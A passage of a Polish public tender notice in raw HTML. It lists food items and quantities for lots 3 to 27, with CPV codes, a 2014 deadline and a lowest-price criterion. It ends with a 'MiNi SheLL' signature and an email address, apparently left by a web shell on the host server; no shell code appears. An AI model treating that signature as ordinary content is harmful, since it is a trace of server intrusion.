koper	szt	100
koper duży	szt	15
marchew młoda	kg	50
marchew myta	kg	400
ogórek świeży	kg	250
papryka świeża	kg	80
pieczarka	kg	80
pietruszka korzeń	kg	20
pomidor	kg	200
por 	szt	40
por 	kg	100
rzodkiewka pęczki	szt	120
sałata	szt	100
seler	kg	190
szczypiorek	szt	70
zielenina natka	szt	250
ziemniaki 	kg	3500
ziemniaki młode	kg	400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4 - warzywa przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> chrzan tarty 160g	szt	15
fasolka czerwona konserw.400g	szt	10
groszek konserwowy 400g	szt	40
groszek z marchewką 0,9l	szt	20
kapusta kiszona  	kg	180
koncentrat pomidorowy 0,9l - 1l	szt	55
kukurydza konserwowa 400g	szt	40
ogórki kiszone 	kg	100
ogórki konserwowe 0,9l	szt	90
ogórki małosolne	kg	15
papryka konserwowa 0,9l	szt	85
pieczarka konserwowa 0,9l	szt	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5 - mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> brokuły mroż. 2,5 kg	szt	8
brukselka mroż 0.5 kg	szt	20
Frytki 2 kg	szt	20
hamburger mrozony 	szt	180
kalafior mroż	kg	25
marchew kostka mroż	kg	50
mieszanka kompotowa 	kg	15
pizza 500g	szt	90
pyzy z mięsem  	kg	70
pyzy z owocami (knedle)	kg	60
truskawki mrozone	kg	10
warzywa na pat.chinskie	kg	10
zapiekanka 200g	szt	135
zupa wiosenna	kg	25.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6 - jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jaja	szt	3500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 7 - mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> baleron wieprzowy	kg	50
boczek świeży	kg	40
boczek wędzony surowy	kg	90
filet drobiowy z indyka	kg	18
filet królewski z indyka lu równoważny	kg	50
filet z piersi kurczaka	kg	114
golonka wieprz b/k	kg	12
karkówka wieprz b/k 	kg	100
kaszanka	kg	70
kiełbasa biała  surowa	kg	20
kiełbasa biała parzona	kg	20
kiełbasa krakowska	kg	50
kiełbasa szynkowa drobiowa	kg	150
kiełbasa szynkowa wieprzowa	kg	150
kiełbasa śląska lub równowazna	kg	90
kiełbasa toruńska lub równowazna	kg	50
kiełbasa typu ogniskowa lub równoważna	kg	40
korpusy drobiowe(grzbiety)	kg	200
kości wieprzowe	kg	100
kotlet do hamburgera 250g	szt	96
łopatka b/k	kg	400
metka cebulowa 200g	szt	90
metka inna typu wiejska lub równowazna	kg	20
mielonka konserwowa	kg	50
mielonka śniadaniowa lub równowazna	kg	40
mięso gulaszowe	kg	50
mortadela	kg	50
ogonówka 	kg	60
parówka w folii	kg	50
parówka wiedenska lub równowazna	kg	40
pasztet zapiekany	kg	15
pasztetowa  domowa lub równowazna	kg	50
polędwica drobiowa	kg	80
polędwica sopocka drobiowalub równowazna	kg	30
przysmak śniadaniowy 130g	szt	45
przysmak w konserwie lub równowazny	kg	25
salami rodzinne lub równowazne	kg	9
schab wiep b/k	kg	70
serdelki	kg	40
słonina	kg	6
smaczek konserwowy lub równowazny	kg	40
szynka konserwowa 	kg	60
szynka mielona	kg	45
szynka typu królewiecka mielo lub równowazna	kg	15
szynka wiep b/k	kg	30
szynka wieprzowa - wędlina	kg	30
turystyczna lub równowazna	szt	45
tyrolska lub równowazna	kg	35
tyrolska puszka 300g lub równowazna	szt	45
udka z kurczaka	kg	300
wątroba drobiowa z kurczaka	kg	50
wątroba wieprzowa	kg	40
żeberka wiep	kg	30
żołądki drobiowe	kg	30
żywiecka lub podobne	kg	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie nr 8 - ryby i przetwory konserwowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> filet z mintaja	kg	60
makrela wędzona	kg	25
matijas	kg	20
panga	kg	80
paprykarz 156g	szt	60
szprot w pomidorach	szt	50
śledź w pomidorach	szt	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie nr 9 - produkty przemiału ziarna i skrobi - pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> bułka tarta	kg	60
bułki 50g	szt	460
bułki hamburger	szt	140
bułki pszenne100g	szt	420
chleb krojony pszenny 0,6 kg	szt	5000
chleb ziarnisty 400g	szt	200
ciasta różne	kg	9
drożdżówki	szt	135
pączki 100g	szt	135
rogal 100g	szt	140.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie nr 10 - produkty skrobi - mąka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> kasza jęczm. Średnia	kg	40
kasza manna	kg	30
mąka pszenna typu 450	kg	120
mąka pszenna typu 500	kg	150
mąka ziemiaczna	kg	25
platki kukur. 500 g	szt	50
platki kukur.kakaowe 250g	szt	20
platki kukur.kakaowe 500g	szt	50
płatki kukurydz. 250G	szt	30
płatki typu  chocapic 500g	szt	20
ryż 1kg	kg	40
ryż w woreczkach 0,5kg	szt	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.64.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie nr 11 - różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> barszcz czerwony- koncentrat 300ml 	szt	40
baton   	szt	45
baton czekoladowy nadziewany	szt	135
baton czekoladowy w opakowaniu	szt	90
bialy barszcz	szt	50
budyń 40g	szt	200
chrupki kukurydziane	szt	48
ciastka kruche	kg	14
ciastka typu wafelki	kg	14
ciastka typy pierniki	kg	14
ciastka w polewie	kg	14
cukier	kg	600
cukier puder  0,5 kg	szt	50
cukier waniliowy	szt	100
cukierki czekoladowe	kg	14
cukierki owocowe	kg	6
cukierki typu krówki	kg	9
cynamon 0,20g	szt	24
czekolada nadziewana	szt	135
czekolada pełnomleczna	szt	180
czekolada z orzechami	szt	48
czipsy 9g	szt	135
drożdże 100g	szt	40
galaretka owocowa	szt	150
hebata expres owocowa 25szt	szt	10
herbata expr. Mietowa 20szt	szt	5
herbata expres 100 szt	szt	100
herbata owoc.rozpusz gran.	szt	15
herbata zielona expre25szt	szt	20
jarzynka 200g	szt	80
kakao rozpuszczalne 300g	szt	80
kawa naturalna mielona 500g	szt	6
kawa rozpuszczalna naturalna	szt	5
kawa rozpuszczalna zboż typu inka	szt	25
Keczup 1 l	szt	5
keczup 500g 	szt	50
keczup pikantny 0.5 	szt	24
kisiel 38g	szt	200
krem czekoladowo orzechowy 200g	szt	40
krem czekoladowo orzechowy 400g	szt	35
krem czekoladowy 200g	szt	250
krem czekoladowy 400g	szt	60
kwasek cytrynowy 20g	szt	100
liść laurowy 12g	szt	40
lizak  serduszko	szt	270
lizak kulka	szt	45
Łazanki 0.5	szt	35
magi w plynie 1 l	szt	40
majeranek 150g	szt	8
majeranek 20g	szt	40
majonez   700g  	szt	20
majonez  400g 	szt	50
majonez 900g do sałatek	szt	16
makaron gniazda 1kg	szt	40
makaron nitki  0.5 kg	szt	50
makaron rurki 1 kg	szt	30
makaron spagetti 0,5kg	szt	70
makaron świderki 1kg	szt	50
mikołaj czekoladowy	szt	48
Miód naturalny 0,9 l	szt	8
miód sztuczny  5kg	szt	2
miód sztuczny 200g	szt	46
musztarda  Sarepska 180g	szt	36
musztrda tuba 0.5 l	szt	14
Ocet 10%	szt	20
paluszki solone 0,400g	szt	24
paluszki z sezamem 70g	szt	135
papryka mielona 20g	szt	60
paprykarz szczcz. 300G	szt	45
paprykarz szczeciń 131g	szt	96
pasztet 135g z pomidorami	szt	96
pasztet puszka 160g	szt	96
pieprz mielony 20g	szt	300
pieprz ziolowy 20g	szt	30
polewa do lodów 1 l	szt	5
polewa do lodów 250g	szt	8
proszek do pieczenia 0,20 g	szt	60
przyprawa do grilla 20g	szt	16
przyprawa do kurczaka 1 kg	szt	2
przyprawa do kurczaka 30g	szt	50
przyprawa do mięsa 30g  	szt	30
przyprawa gyros 30	szt	40
rosól drobiowy 1 kg	szt	5
rosół drobiowy kostki 60g 	szt	30
sos  bolones 0,500l	szt	20
sos do deserów 1 l	szt	10
sos do hamburgerow 1 l	szt	10
sos fix do spagetti 45g	szt	200
sos mix koper-zioł, włoski itp. 9g	szt	100
sos salatkowy mix 700g	szt	8
sos słodko-kwaśny  0,5	szt	48
sos sojowy 1l	szt	4
sól	kg	180
vegeta 200g	szt	80
wafelek b/polewy 	szt	230
wafelek w polewie	szt	92
wiórki kokosowe 200g	szt	30
zelatyna 50g	szt	30
zestaw świateczny (np.czelolada, baton, mikołaj)	szt	45
zestaw świąeczny(np. Czekolada, zajączek, baton)	szt	45
ziele angielskie 15g	szt	25
ziele angielskie 600g 	szt	2
zupki  chińska(ostra,łagodna rosołowa itp.)	szt	320
zupki chińska	szt	45
zurek w proszku 60g	szt	150
żurek w butelce 0,5l	szt	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie nr 12- oleje i tłuszcze roślinne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Margaryna  do pieczenia 250g	szt	50
margaryna z masłem 500g	szt	300
masło roślinne 200g	szt	45
olej 1l	szt	120
olej 3l	szt	20
oliwa z oliwek 1 l	szt	1
smalec	kg	3
smalec 200g	szt	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadanie nr 13 - produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> deser	szt	96
deser czekoladowo orzecgowy	szt	48
jogurt owocowy 150g	szt	830
jogurt pitny 200g	szt	230
jogurt z owocami 	szt	48
kefir 0,5l	szt	46
lody 1000g	szt	12
lody 100g	szt	92
masło śmietank. 200G	szt	1350
maślanka owocowa 0,5	szt	92
Mleko 3,2  1l UHT	szt	700
ser edamski	kg	50
ser gouda	kg	50
ser morski	kg	25
ser salami	kg	50
ser top. krążek 140g	szt	120
ser topiony -kielbaski 100g	szt	70
ser twarogowy 200g	szt	100
ser twarogowy półtusty	kg	50
ser tylżycki	kg	50
ser wędzony	kg	12
ser złoty mazur	kg	25
serek grani 	szt	185
serek homogenizowany 150g	szt	230
serek kanapk. Twarożk. 125g	szt	300
serek twarożkowy w kubeczku 150g	szt	200
set topiony kostka 100g	kg	50
Smietana 30% 0,5l kubek	szt	30
Śmietana 12% - słodka 0,5l UHT	szt	40
Śmietana 18% 400ml - zakwaszana	szt	250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadanie nr 14 - napoje.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> napoje gazowane 1,5 l	szt	70
napoje niegazowane 1,5 l	szt	70
napój gazowany 2l	szt	14
napój n/g 2 l	szt	14
napój energet	szt	138
woda mineralna 0,5 gazowana	szt	144
woda 0,5 n/g 	szt	144
woda mineralna n/g 1,5 l 	szt	100
woda mineralna g 1,5 l 	szt	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.90.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zadanie nr 15 - cukiernicze produkty.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ananas ( w syropie )	szt	10
Brzoskwinia ( w syropie )	szt	5
Chałwa	szt	10
Cukier kryształ	kg	200
Cukier puder	kg	150
Cukier waniliowy	kg	2
Cynamon	kg	1
Dekoracje czekoladowe 	op	1
Drożdże	kg	10
Emulgator ( pronto )	kg	5
Esencja anyżowa	szt	1
Esencja cytrynowa 	szt	1
Esencja migdałowa	szt	1
Esencja waniliowa	szt	1
Galaretki różne	kg	5
Gałka muszkatałowa mielona	kg	1
Gożdzik mielony	kg	1
Jabłko prażone	kg	50
Jajka	szt	2000
Kakao	kg	10
Kokos medium	kg	5
Krem budyniowy (na zimno) ideal	kg	20
Kuwertura biała	kg	5
Kuwertura deserowa	kg	30
Mak niebieski	kg	50
Mąka pszenna tortowa	kg	300
Mąka ziemniaczana	kg	100
Marcepan ( 50% )	kg	10
Margaryna ( 80% )	kg	200
Margaryna puff	kg	50
Marmolada	kg	20
Masa marcepanowa	kg	10
Masa orzechowa	kg	10
Masa ticino	kg	10
Masło	kg	50
Migdały 	kg	5
Miód płynny	kg	2
Nadzienie makowe	szt	5
Olej	szt	30
Orzech laskowy	kg	5
Orzech włoski	kg	5
Orzech ziemny	kg	5
Pomada wodna	kg	40
Proszek do pieczenia	kg	1
Przyprawa korzenna	kg	5
Rodzunki	kg	10
Skórka pomarańczowa	kg	10
Spirytus cukierniczy	l.	1
Stabilizator neutral	kg	2
Śmietana naturalna 30%	szt	40
Tłuszcz cukierniczy	kg	2
Tłuszcz frytura	l	5
Toffi ( kajmak )	kg	10
Twaróg świeży	kg	50
Wisnia kandyzowana	kg	5
Wisnia w zelu	szt	6
Żelatyna spożywcza	kg	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Zadanie nr 16 - owoce świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> cytryny	kg	2
jabłka	kg	2
pomarańcze	kg	1
śliwki węgierki	kg	2
truskawki	kg	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Zadanie nr 17 - owoce przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ananas konserwowy ( puszka )	szt	2
brzoskwinie konserwowe ( puszka )	szt	2
rodzynki ( paczka )	szt	2
orzechy włoskie	kg	1
śliwki suszone ( paczka )	szt	2
sok malinowy	litry	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Zadanie nr 18 - warzywa świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> brokuły 1kg	szt	2
buraki	kg	4
cebula	kg	6
czosnek	szt	4
fasola	kg	1
fasola szparagowa	kg	1
groch 0,5 kg	szt	2
kalafior 1kg.	szt	2
kapusta biała	szt	4
kapusta czerwona	kg	3
kapusta pekińska	szt	2
koper	szt	6
marchew	kg	9
natka pietruszki	szt	6
ogórek świeży	kg	4
papryka świeża	kg	4
pieczarki	kg	2
pietruszka	kg	4
pomidor	kg	2
por	kg	4
sałata zielona	szt	4
seler	kg	4
ziemniaki	kg	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.53.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Zadanie nr 19 - warzywa przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> czerwona fasola ( puszka )	szt	2
groszek konserwowy ( puszka )	szt	4
kapusta kiszona	kg	3
koncentrat buraczany	szt	2
koncentrat pomidorowy 0,9l	szt	4
kukurydza konserwowa ( puszka )	szt	4
ogórek kiszony	kg	1
ogórek konserwowy 0,9l	szt	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Zadanie nr 20 - jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	jaja	szt	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Zadanie nr 21 - mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> boczek wędzony	kg	1
filet z piersi kurczaka	kg	1
karkówka	kg	1
kiełbasa śląska	kg	1
korpus drobiowy	kg	6
kurczak   ( szt )	kg	3,6
łopatka	kg	1
schab świeży	kg	1
wątróbka drobiowa	kg	1
żołądki drobiowe	kg	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Zadanie nr 22 - ryby i przetwory konserwowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> filet rybny ( panga )	kg	1
filety śledzowe sol.	kg	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0, 15.20.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Zadanie nr 23 - produkty przemiału ziarna i skrobi - pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> bułka tarta	kg	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Zadanie nr 24 - produkty skrobi - mąka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> kasza gryczana	kg	2
kasza manna	kg	1
mąka pszenna	kg	6
mąka ziemniaczana	kg	1
ryż ( saszetki )	kg	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Zadanie nr 25 - różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> bazylia ( paczka 20g )	szt	2
budyń śmietankowy	szt	2
cukier	kg	4
galaretka owocowa	szt	2
kisiel ( paczka )	szt	2
kostki rozosłowe ( bulion 60g )	szt	4
kwasek cytrynowy ( paczka 20g )	szt	4
liść laurowy ( paczka 12 g )	szt	2
magii 1l	szt	2
majeranek ( paczka 20g )	szt	2
majonez 400g	szt	4
makaron	kg	1
musztarda stołowa 180g.	szt	2
papryka mielona słodka ( paczka 20g )	szt	2
pieprz ( paczka 20g )	szt	6
przyprawa do kurczaka ( paczka 20g )	szt	4
przyprawa do mięsa ( paczka 20g )	szt	4
sól	kg	1
tymianek ( paczka 20 g )	szt	2
wegeta ( paczka 200g )	szt	4
ziele angielskie ( paczka 15g )	szt	2
żelatyna ( paczka 50 g )	szt	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Zadanie nr 26- oleje i tłuszcze roślinne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> olej	litry	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Zadanie nr 27 - produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> masło ( kostka )	szt	4
mleko 3,2% UHT	litry	4
ser biały ( twaróg )	kg	2
ser feta ( paczka )	szt	2
ser żółty	kg	1
śmietana UHT 1/2 l	szt	2
śmietana zakwasz. 18% 400ml	szt	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com